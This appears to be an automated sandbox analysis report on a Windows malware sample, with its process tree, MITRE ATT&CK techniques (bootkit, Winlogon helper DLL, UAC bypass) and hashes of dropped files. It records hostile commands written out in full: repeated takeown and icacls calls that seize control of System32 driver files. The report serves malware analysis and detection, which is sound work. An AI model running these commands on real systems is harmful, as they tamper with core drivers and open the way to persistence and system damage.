C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wimmount.sys && icacls C:\Windows\System32\drivers\wimmount.sys /grant "%username%:F" && exit2⤵PID:8076
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\wimmount.sys3⤵PID:7540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\winhv.sys && icacls C:\Windows\System32\drivers\winhv.sys /grant "%username%:F" && exit2⤵PID:8116
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\winhv.sys3⤵
- Modifies file permissions
PID:7372
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\winhv.sys /grant "Admin:F"3⤵PID:7580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wmiacpi.sys && icacls C:\Windows\System32\drivers\wmiacpi.sys /grant "%username%:F" && exit2⤵PID:7276
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\wmiacpi.sys3⤵PID:7456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wmilib.sys && icacls C:\Windows\System32\drivers\wmilib.sys /grant "%username%:F" && exit2⤵PID:7536
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\wmilib.sys3⤵PID:7516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ws2ifsl.sys && icacls C:\Windows\System32\drivers\ws2ifsl.sys /grant "%username%:F" && exit2⤵PID:7800
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ws2ifsl.sys3⤵PID:8160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\WUDFPf.sys && icacls C:\Windows\System32\drivers\WUDFPf.sys /grant "%username%:F" && exit2⤵PID:7692
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\WUDFPf.sys3⤵
- Possible privilege escalation attempt
PID:7632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\WUDFRd.sys && icacls C:\Windows\System32\drivers\WUDFRd.sys /grant "%username%:F" && exit2⤵PID:7612
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\WUDFRd.sys3⤵
- Modifies file permissions
PID:7924
-
-
-
- C:\Windows\system32\conhost.exe (PID 668): \??\C:\Windows\system32\conhost.exe "54895417653445655620751004148627423071719257307-525580787-7071774771257655175"
- C:\Windows\system32\conhost.exe (PID 2952): \??\C:\Windows\system32\conhost.exe "1621733526-12011147161859254869-1695348543-119211382-14980353089736523011016234392"
- C:\Windows\system32\conhost.exe (PID 1624): \??\C:\Windows\system32\conhost.exe "-11435681537744094457464622-1367195511839874554826055691649856111821994029"
- C:\Windows\system32\conhost.exe (PID 576): \??\C:\Windows\system32\conhost.exe "-3576495458805297127931491901025074956982201503-18164519511215232641-553113933"
- C:\Windows\system32\conhost.exe (PID 2200): \??\C:\Windows\system32\conhost.exe "-346397899200832466614001831481313348780437562311510088114-1597840612177851318"
- C:\Windows\system32\conhost.exe (PID 2096): \??\C:\Windows\system32\conhost.exe "-1674539640209590052-620824865-345331065-1712403586-159578867353962019-1418431666"
- C:\Windows\system32\conhost.exe (PID 1724): \??\C:\Windows\system32\conhost.exe "-27307056-51626916521179988316284245471316335247-1458593264-5854637631505391222"
- C:\Windows\system32\conhost.exe (PID 2728): \??\C:\Windows\system32\conhost.exe "-1959520742-21406153961186878365-1770231113-1520222623889518384303678895307505780"
- C:\Windows\system32\conhost.exe (PID 2204): \??\C:\Windows\system32\conhost.exe "84393655621056928821897055320-4313130461010516710-17565270531541018284-1549995032"
- C:\Windows\system32\conhost.exe (PID 2636): \??\C:\Windows\system32\conhost.exe "-8269622711828898472-2055274167-9621063312076265785-276465396-1076308921614959540"
- C:\Windows\system32\conhost.exe (PID 2696): \??\C:\Windows\system32\conhost.exe "907999213135224872096942724311911542271954400322-1486061824-1117093346394661065"
- C:\Windows\system32\conhost.exe (PID 760): \??\C:\Windows\system32\conhost.exe "-18951402328773463577693775105288011971796319081-466364653130441321400013580"
- C:\Windows\system32\conhost.exe (PID 1268): \??\C:\Windows\system32\conhost.exe "832134706-4131248092025083737-789389331-2019538104-756545179-1377304373197514798"
- C:\Windows\system32\conhost.exe (PID 2764): \??\C:\Windows\system32\conhost.exe "950490706-5584995251537408815-1309645106-13177898181789902148-1484646813-1280944784"
- C:\Windows\system32\conhost.exe (PID 1388): \??\C:\Windows\system32\conhost.exe "10574926018162032349417425271841068690-2146251370170320052712519946551363881966"
- C:\Windows\system32\conhost.exe (PID 1000): \??\C:\Windows\system32\conhost.exe "1761861311228798064-1223620581610275829-8453910321511030513295823737-30130781"
- C:\Windows\system32\conhost.exe (PID 2600): \??\C:\Windows\system32\conhost.exe "583892375-1460933130-16170746771981842696-2103827964-160302078716198758971117849232"
- C:\Windows\system32\conhost.exe (PID 2512): \??\C:\Windows\system32\conhost.exe "-853127713772086928368335505-513630690-1450586175-18943463811370168503-735799625"
- C:\Windows\system32\conhost.exe (PID 740): \??\C:\Windows\system32\conhost.exe "358573084-960319267877290552-168505249-1209121303-994186568-737338682-63422102"
- C:\Windows\system32\conhost.exe (PID 2464): \??\C:\Windows\system32\conhost.exe "-137757887-2050928685-193987438-21198619938663582785240919491259895822-1405341401"
- C:\Windows\system32\conhost.exe (PID 380): \??\C:\Windows\system32\conhost.exe "1582131915-1818442508345966894405292231-965675916-1306464604-1358459872-44459498"
- C:\Windows\system32\conhost.exe (PID 2824): \??\C:\Windows\system32\conhost.exe "1798329338-412655061-1789956836-20815899961324467237-438090289-984704158-1466973907"
- C:\Windows\system32\conhost.exe (PID 1488): \??\C:\Windows\system32\conhost.exe "1384728197-782569420-1993577204-1328441073345696650-1464539075371820741326197602"
- C:\Windows\system32\conhost.exe (PID 2076): \??\C:\Windows\system32\conhost.exe "-1214900420-452387530-11941999901158575697-1538806498-820565254-17228258001313359688"
- C:\Windows\system32\conhost.exe (PID 3248): \??\C:\Windows\system32\conhost.exe "-738759891-169272849-12220861111889045868182299802103036214-1128965893-2133076818"
- C:\Windows\system32\conhost.exe (PID 3460): \??\C:\Windows\system32\conhost.exe "909442621611109525-18363644442061430844-1703659490-21187344381522763982507322104"
- C:\Windows\system32\conhost.exe (PID 3492): \??\C:\Windows\system32\conhost.exe "1171447329-1550907193-1142626495-45893687316679545081609237795857084959-158731582"
- C:\Windows\system32\conhost.exe (PID 2580): \??\C:\Windows\system32\conhost.exe "-1511126505-57948661-2121121221-1685339390-357417678-705356418-97221525-564529714"
- C:\Windows\system32\conhost.exe (PID 1004): \??\C:\Windows\system32\conhost.exe "12335844677926123231623818862-1210951843-1430338803-326344980-273474033183630140"
- C:\Windows\system32\conhost.exe (PID 3908): \??\C:\Windows\system32\conhost.exe "912181822-635074711-1791628637-174953248212170523841414846830828055649-47828480"
- C:\Windows\system32\conhost.exe (PID 3288): \??\C:\Windows\system32\conhost.exe "-9083195921674414138625466066-11536012182275338281101342393-364201837-1487883231"
- C:\Windows\system32\conhost.exe (PID 1052): \??\C:\Windows\system32\conhost.exe "6262467071981080528-1710126922483141467-18320258611537763204114712572-2135070936"
- C:\Windows\system32\conhost.exe (PID 1516): \??\C:\Windows\system32\conhost.exe "-8830745741128541469947272867817346731703568792853994779-1036088981303627429"
- C:\Windows\system32\conhost.exe (PID 3736): \??\C:\Windows\system32\conhost.exe "-1847074793-100451235-599949181-847067753-1100701012768583410-14116908911596100789"
- C:\Windows\system32\conhost.exe (PID 3600): \??\C:\Windows\system32\conhost.exe "79985939081526473503366797690443411815582440-1310187774589433001-701673817"
- C:\Windows\system32\conhost.exe (PID 3996): \??\C:\Windows\system32\conhost.exe "19467059371834272716-499791449-20701899416360086008026456651472278311-851961786"
- C:\Windows\system32\conhost.exe (PID 4068): \??\C:\Windows\system32\conhost.exe "-2122788361728764020628613667-131468001110783859975834662945942944031109612079"
- C:\Windows\system32\conhost.exe (PID 3448): \??\C:\Windows\system32\conhost.exe "2110594314-66729367899563309321225789271018018137-11225088591368696231605207980"
- C:\Windows\system32\conhost.exe (PID 4048): \??\C:\Windows\system32\conhost.exe "343668591043237973-1345592523-819772282-186996909476017302-574494909-1854474076"
- C:\Windows\system32\conhost.exe (PID 2596): \??\C:\Windows\system32\conhost.exe "7622787231076324505-961219213153677226710162594931765731719-633592419-581249756"
- C:\Windows\system32\conhost.exe (PID 3784): \??\C:\Windows\system32\conhost.exe "176302930045025510950355524416160479211771133419-744891285812383129887332056"
- C:\Windows\system32\conhost.exe (PID 3760): \??\C:\Windows\system32\conhost.exe "-169368444917609499241822192359870360578-11255443691343591135329150358-214181262"
- C:\Windows\system32\conhost.exe (PID 4320): \??\C:\Windows\system32\conhost.exe "-2083406644-458252017-18109127521619987457-1850783277334125821291293891407213967"
- C:\Windows\system32\conhost.exe (PID 4924): \??\C:\Windows\system32\conhost.exe "-1792147420114453575-774491207-1718244553-21129321871958232276-20383139511088840636"
- C:\Windows\system32\conhost.exe (PID 4436): \??\C:\Windows\system32\conhost.exe "14141827161144511199216336081-1620129348105240240415728709031089094628-1809725220"
- C:\Windows\system32\conhost.exe (PID 5060): \??\C:\Windows\system32\conhost.exe "2354215381865823453-1244352468-1769240951965668692299531523645479703-1318357360"
- C:\Windows\system32\conhost.exe (PID 3752): \??\C:\Windows\system32\conhost.exe "-1939424173-168191625012758793563910675766062758893989050482044828546-502326009"
- C:\Windows\system32\conhost.exe (PID 4868): \??\C:\Windows\system32\conhost.exe "1073366037-50025725519140407777061917002008316185136993642357581868-63714414"
- C:\Windows\system32\conhost.exe (PID 4236): \??\C:\Windows\system32\conhost.exe "-898134462-20183623676635918-1036682329-1058665174-123364791-443841215-519531165"
- C:\Windows\system32\conhost.exe (PID 5408): \??\C:\Windows\system32\conhost.exe "-169972305613419550011619440335-356624949362210721-6289303329923361602134556258"
- C:\Windows\system32\conhost.exe (PID 5992): \??\C:\Windows\system32\conhost.exe "620461132-123426941-1962000978100470382739756888-800552722-18831081841347159523"
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "18464894961532086107-10781256931693970440-1511652894534463130-11958893231369018071"1⤵PID:4624
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2118435253470978354-20081491951727838961370813369-111788706175611160-2122573909"1⤵PID:5976
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2093618180-34186218916457965602021462804-18472826642848317552096112729-1186846217"1⤵PID:5940
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-20333551891001056542840815792-19469999691057130786-8524922081803101268443354641"1⤵PID:4112
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1196916639724021235-1103036701822276615222813484-1054341173-9578017631409481701"1⤵PID:5316
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "20279316601214512637379116672-2112459730-1459444142-676821496-13539574311087169992"1⤵PID:5268
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-36419231531891834161490150417601481821210273006-451914781-4150815481147947242"1⤵PID:5524
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "21325274891690799625-411762690-210458370144587626-1287372400-894139989-773496203"1⤵PID:5604
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "477630112303842847-1538966470-2321699561507441143375011481-272179162861774097"1⤵PID:6064
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-89761958017178179411303792914052658301194957496-744994024-582986565-491657284"1⤵PID:4460
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-3430514931322808691-219821169-171481091121267239641288379812192196806-1126358956"1⤵PID:6088
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1810580017-1318082151-846321335-537303132-1739101191366048271-1727058649-111601746"1⤵PID:6320
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1625138446-5715141801621539351-1780038514109099997716152097851121320139-763580898"1⤵PID:6896
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1218423955-608181404-1800546392-743557101-6093101861417298479-6596790571616924845"1⤵PID:7036
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-109457793113897049151164471431363502228-200743819816811799701919143210-2097874320"1⤵PID:5296
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1259855074-1977245523445304510421788527-1319203107-70223348-412296947-1672291520"1⤵PID:6656
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-5011441411538511296-253857375-1144637001-1801877649-133371606-1111799872690809377"1⤵PID:6920
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-18238221211964626545-338877014904311416788685891591179566118515548926652419"1⤵PID:5192
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "358339041484075351389181171-710513929217506289-1645797217-12983784361456269411"1⤵PID:7100
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1676233521650095527-209488350-20796147191314991021121089822-1936053828-382493566"1⤵PID:7080
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1962448231-1997928778165795822-1713653724-6492329517419397102119465381-782539627"1⤵PID:7404
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "60305341856596105-1218882355626985905396170726-1046832195-475847905653480907"1⤵PID:7936
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "644261067-156735115921421796631022974113-1803620011258711272392910789648484019"1⤵PID:8144
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-294590014901780365-178235231-1400509292109430596019378631522066116248297984904"1⤵PID:7240
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1200744732-1536618827160294134-816768690-13835457391037646315943764398-771462098"1⤵PID:7292
Network
MITRE ATT&CK Enterprise v15
Persistence
  Boot or Logon Autostart Execution 2
    Winlogon Helper DLL 2
  Event Triggered Execution 1
    Change Default File Association 1
  Pre-OS Boot 1
    Bootkit 1
Privilege Escalation
  Abuse Elevation Control Mechanism 1
    Bypass User Account Control 1
  Boot or Logon Autostart Execution 2
    Winlogon Helper DLL 2
  Event Triggered Execution 1
    Change Default File Association 1
Downloads
-
C:\Users\Admin\Desktop\₧¤ß¾╔63ö◄•ř²¾▼åßóΣ╧╩↑å♪ř╩♂╚ě±2♫™♀š¶œÂ♪☼¤☻4↑Ç6¼í×™æ◙¢2◙╩¶½4žě♠♦µ¼☺č∞í☺♠↕ÿ₧õřπïě¬ñßŸě¢±╩5◙φ™²♦ε¥1—¤σŸí
Filesize 666B
MD5 9e1e5883c74742a497cf5c272ccd2321
SHA1 2cf33e34d08b8e17743a60352baffef4b6f02dee
SHA256 ca687b6a7c3d29b566f3e1988b9f877b51d9a83ee25ffe0755a8dcd3eb5f434a
SHA512 f2284f0c624cc07a65c16f87865bb98aaa176b1d8b45cd4fbcc1143c9c2297fe6b1d4db55ef054be2bc151c8cc25ff4da7c997b7d38dae3dccd2ffe1c3c01a6b
-
Filesize 103KB
MD5 373d53d7c6709d5106b29a26a71b0d31
SHA1 1708009c111266ba513503e06b94a5ccd402dee5
SHA256 de3f42bc53000d3dad58f3182108c414ce8062095ef390314fcc628473490c86
SHA512 15b32cd9b87a9852d6ad0f03321edb15468e136a220ff4473bc109355c9b401a4c4f7eeb99ad7097c67f9cfac7c416f84038c0639e4db59561d2dbc74ef5d67d
-
Filesize 418KB
MD5 f5007f18070e9cfc0b23c5ebb25c4468
SHA1 cf430806009fe87580705a85474a8604c84292fe
SHA256 18f27d42b09fe462af83c3ec3e82842e09a7db2e9c69cb6044e977b7af87a3c9
SHA512 7b9de630ea04314813895e2dc8908429bc393f2a7c0dd50ed1ac7802f8ba3d36998886bd9da3dd7c857a992dd9aecf016eb55a0cb33a3b234fa1e3137f094c50